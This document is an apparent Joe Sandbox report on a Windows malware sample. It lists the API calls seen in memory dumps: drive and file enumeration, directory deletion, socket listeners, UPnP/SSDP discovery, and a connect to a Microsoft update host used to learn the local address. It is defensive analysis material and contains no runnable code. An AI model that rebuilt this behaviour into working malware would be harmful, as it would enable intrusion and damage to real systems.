                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                                • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                                APIs
                                                                                • NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                • RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$QuerySecondsSince1980System
                                                                                • String ID:
                                                                                • API String ID: 1987401769-0
                                                                                • Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                                                                • Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
                                                                                • Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                                                                • Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                APIs
                                                                                • NtQueryVirtualMemory.NTDLL ref: 0040F63A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryQueryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2850889275-0
                                                                                • Opcode ID: f16b58d761c70c95d03f79e7966dae03a2d536073a04c8b8cccb22e3b2e6a59a
                                                                                • Instruction ID: 9733fa80924a8a5ad1036197057c78bb5b5de5c771e2c1a8e274ddcee5554a15
                                                                                • Opcode Fuzzy Hash: f16b58d761c70c95d03f79e7966dae03a2d536073a04c8b8cccb22e3b2e6a59a
                                                                                • Instruction Fuzzy Hash: 4661D7307006069FDB39CF29C99066A37A1EB95314F24853BD841E7AE1E77EDC4A878D
                                                                                APIs
                                                                                • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A3AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapsProcess
                                                                                • String ID:
                                                                                • API String ID: 1420622215-0
                                                                                • Opcode ID: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                                                                • Instruction ID: 6b1605b91c8b6ff823dfc00cf925f95a0a494f8de984c14b3e814ef03953d6f2
                                                                                • Opcode Fuzzy Hash: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                                                                • Instruction Fuzzy Hash: 9C01DAB4904228CADB308F14D9887A9B774AB84304F1081FADB0977281C3B82ED6DF5E
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
